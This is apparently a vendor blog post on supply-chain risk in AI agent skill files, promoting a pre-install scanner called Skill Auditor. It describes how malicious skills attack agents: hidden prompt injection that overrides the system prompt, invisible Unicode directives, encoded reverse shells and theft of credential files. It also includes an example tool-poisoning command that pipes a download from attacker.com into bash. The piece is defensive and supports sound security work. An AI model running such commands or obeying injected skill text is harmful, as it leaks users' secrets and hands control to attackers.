Engineering

The MCP Supply Chain Problem Nobody Is Talking About

Panguard AI TeamMarch 12, 20267 min

MCP marketplaces make installing AI agent tools effortless. But every skill runs with your agent's full permissions. One malicious SKILL.md can exfiltrate your credentials, inject prompts, or open a reverse shell. Here is how Skill Auditor solves this.

The npm Moment for AI Agents

Remember the early days of npm? Developers installed packages freely because the ecosystem was small and trust was implicit. Then came event-stream. Then ua-parser-js. Then colors and faker. The JavaScript ecosystem learned the hard way that an open package registry without security scanning is a supply-chain attack waiting to happen.

AI agent skills are following the exact same trajectory -- but faster, and with higher stakes.

MCP (Model Context Protocol) marketplaces, OpenClaw skill registries, and community-shared SKILL.md files make it trivially easy to extend your agent with new capabilities. Need a GitHub integration? Install a skill. Need database access? Install a skill. Need web scraping? Install a skill.

Every one of those skills runs with your agent's full permissions. Your agent can read files, access environment variables, call APIs, and execute code. When you install a skill, you are granting that skill the same access.

What a Malicious Skill Looks Like

A well-crafted malicious skill does not look malicious. It looks like a helpful tool with clean documentation and a professional README. The attack surface is broad:

Prompt Injection. The skill description contains hidden instructions that override the agent's system prompt. The agent begins following the attacker's instructions instead of the user's. This requires no code execution -- just carefully worded text in a markdown file.

Tool Poisoning. The skill embeds shell commands in its tool definitions. When the agent invokes the tool, it executes curl attacker.com/exfil | bash alongside the legitimate operation. The user sees the expected output. The attacker receives the environment variables.

Hidden Unicode. Zero-width characters and right-to-left overrides hide malicious instructions from human review. The skill file looks clean in a text editor but contains invisible directives that the LLM processes faithfully.

Encoded Payloads. Base64-encoded strings that decode to eval() or subprocess.run() calls. The skill description says "helper utility." The encoded payload says "reverse shell."

Secret Exfiltration. The skill references .env, .ssh/, .aws/credentials, or ~/.config/ paths. It reads credentials and sends them to an external endpoint disguised as a legitimate API call.

Why Existing Security Tools Miss This

Traditional security tools were not designed for this threat model. Antivirus scans executables, not markdown files. WAFs inspect HTTP requests, not LLM prompts. SIEM rules correlate log events, not skill file contents.

The attack happens before any code runs. It happens at the content layer -- in the text that shapes the agent's behavior. By the time a traditional security tool could detect the malicious activity, the agent has already been compromised.

The Skill Auditor Approach: 8 Layers, Pre-Install

Panguard Skill Auditor runs before the skill is installed. It inspects the skill file and returns a quantitative risk score (0-100) with specific findings at exact line numbers.

The 8 check layers run in parallel:

●Manifest Validation -- Verifies SKILL.md structure, required fields, and metadata consistency
●Prompt Injection Detection -- 13 regex patterns covering identity override, instruction hijacking, jailbreak attempts, stealth <IMPORTANT> block attacks, and silent data exfiltration
●Hidden Unicode Detection -- Scans for zero-width characters, RTL overrides, and homoglyph attacks that hide malicious content from human review
●Encoded Payload Detection -- Automatically decodes Base64 and flags eval/exec/subprocess patterns in decoded content
●Tool Poisoning Detection -- Identifies reverse shells, privilege escalation commands, RCE payloads, and environment variable exfiltration. Context-aware: patterns in code block examples are automatically downgraded
●SAST and Secret Scanning -- Static analysis for hardcoded API keys, passwords, and tokens
●Permission Scope Analysis -- Context-aware analysis that strips code blocks and negation sections before matching. Distinguishes between skills that mention credentials vs skills that steal them
●Dependency Analysis -- Audits declared dependencies for known vulnerabilities, typosquatting, and supply-chain risks

Quantitative Scoring, Not Binary Verdicts

Most security tools give you a binary answer: safe or unsafe. Skill Auditor gives you a number and the evidence behind it.

Score	Level	Action
0-14	LOW	Safe to install
15-39	MEDIUM	Review findings first
40-69	HIGH	Manual review required
70-100	CRITICAL	Do NOT install

A score of 35 with a single medium-severity finding for a broad regex match is very different from a score of 92 with four critical findings including a Base64-encoded reverse shell. The number tells you how much attention the skill needs. The findings tell you exactly where to look.

Three Lines of Code to Block Malicious Skills

import { auditSkill } from '@panguard-ai/panguard-skill-auditor';

const report = await auditSkill(skillPath);
if (report.riskLevel === 'CRITICAL' || report.riskLevel === 'HIGH') {
  throw new Error(`Blocked: ${skillPath} scored ${report.riskScore}/100`);
}

This is the pre-install gate. Three lines that prevent every HIGH and CRITICAL skill from reaching your agent. Integrate it into your CI/CD pipeline, your agent framework's skill loader, or your MCP server's tool registration flow.

The Bigger Picture: Publisher Is Not Auditor

Open ecosystems need independent security. The entity that publishes a skill should not be the only entity that evaluates its safety. npm learned this and built npm audit. PyPI learned this and integrated safety checks. The AI agent ecosystem has no equivalent -- yet.

Panguard Skill Auditor is that independent third party. It does not publish skills. It does not host a marketplace. It evaluates safety. That separation of concerns is fundamental to trustworthy open ecosystems.

When Skill Auditor finds a threat, it can optionally report the pattern to Threat Cloud -- anonymized, stripped of all PII, encrypted in transit. If three independent users confirm the same pattern, and Claude Sonnet review approves it, the pattern becomes a new ATR detection rule distributed to every user globally.

One developer catches a malicious skill. Every developer is protected from it.

Get Started

npm install @panguard-ai/panguard-skill-auditor

No account. No API key. No configuration. Works on macOS, Linux, and Windows. Scan your first skill in under 30 seconds.